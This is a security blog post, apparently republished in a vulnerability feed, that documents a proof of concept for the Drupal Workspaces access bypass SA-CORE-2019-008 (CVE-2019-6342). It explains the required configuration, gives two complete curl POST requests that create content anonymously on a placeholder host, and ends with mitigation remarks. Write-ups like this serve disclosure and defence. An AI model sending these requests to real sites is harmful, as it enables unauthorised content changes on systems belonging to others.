BlackPENTESTIT:3699C81C5F2D75668446A68245CA8BA5Drupal (SA-CORE-2019-008) Wordspaces Extension Access Bypass PoC
0.004 Low
EPSS
Percentile
73.5%
PenTestIT RSS Feed
Last week, an advisory (SA-CORE-2019-008) addressing a Drupal access bypass vulnerability was made public. MITRE assignedCVE-2019-6342 to this critical vulnerability. This is post to document the steps I took to create a PoC for SA-CORE-2019-008. Last such post on this blog was about Apache JMeter RMI Code Execution PoC (CVE-2018-1297).
Interesting part about this vulnerability is that it affects only Drupal 8.7.4 versions when an experimental extension – Workspaces is enabled. Why would some one enable this extension on production is a question for another discussion. Drupal gives a warning before you enable this extension as well. Anyways, I installed the affected version and browsed to Manage>Extend. Here, if you scroll down toCore (Experimental) you can see a list of experimental extensions that you can enable. A checkbox next to Workspaces indicates that the extension is enabled.
I browsed the blog for any pointers, but did not find any. Then I went back into administration, checking if this needs additional customization. Under Manage>People>Permissions, I found a set of permissions that can be given to “anonymous user”, “authenticated user” and “administrator”. For fun, I enabled the “Bypass content entity access in own workspace” permission for the anonymous user. Here as well, Drupal mentions Warning: Give to trusted roles only; this permission has security implications.
This is where I could see the “Add content” link right on the home page:
This exposed the unauthenticated endpoints to /drupal/node/add/page and /drupal/node/add/article. The only thing now remaining was to capture the requests and reproduce.
PoC for SA-CORE-2019-008 (CVE-2019-6342):
For the node/add/article endpoint:
curl -i -s -k -X $'POST'
-H $'Host: VulnerableDrupalHost' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------315272807531113' -H $'Content-Length: 1470' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1'
--data-binary $'-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="changed"x0dx0ax0dx0a1563834120x0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="title[0][value]"x0dx0ax0dx0aTest - PenTestITx0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="form_build_id"x0dx0ax0dx0aform-5jxFukFMd9qGidaTKqOWpXjslUDhyEKwm96rp-tG6Qsx0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="form_id"x0dx0ax0dx0anode_article_formx0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="body[0][summary]"x0dx0ax0dx0ax0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="body[0][value]"x0dx0ax0dx0aTest - PenTestITx0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="field_tags[target_id]"x0dx0ax0dx0aTest - PenTestITx0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="field_image[0][fids]"x0dx0ax0dx0ax0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="field_image[0][display]"x0dx0ax0dx0a1x0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="revision_log[0][value]"x0dx0ax0dx0ax0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="advanced__active_tab"x0dx0ax0dx0aedit-revision-informationx0dx0a-----------------------------315272807531113x0dx0aContent-Disposition: form-data; name="op"x0dx0ax0dx0aSavex0dx0a-----------------------------315272807531113--x0dx0a'
$'http://VulnerableDrupalHost/drupal/node/add/article'
For the /node/add/page/ endpoint:
curl -i -s -k -X $'POST'
-H $'Host: VulnerableDrupalHost' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 306' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1'
--data-binary $'title%5B0%5D%5Bvalue%5D=Test+page+-+PenTestIT&changed=1563834208&form_build_id=form-BC_Rwxanp3-uWJYB7iftIqLHt2CUXj1GYa1OhSjwJbk&form_id=node_page_form&body%5B0%5D%5Bsummary%5D=&body%5B0%5D%5Bvalue%5D=Test+page+-+PenTestIT&revision_log%5B0%5D%5Bvalue%5D=&advanced__active_tab=edit-revision-information&op=Save'
$'http://VulnerableDrupalHost/drupal/node/add/page'
This results in:
Mitigate SA-CORE-2019-008 (CVE-2019-6342):
The advisory mentions that you need to upgrade to Drupal 8.7.5 to remediate this vulnerability. Interestingly this did not fix the problem for me. I performed an update and the Workspaces extension still shows enabled, without any ability to disable it:
I haven’t gotten to a point to disable it, but I guess this is why Drupal rated this as a Critical vulnerability.
The post Drupal (SA-CORE-2019-008) Wordspaces Extension Access Bypass PoC appeared first on PenTestIT.
Related
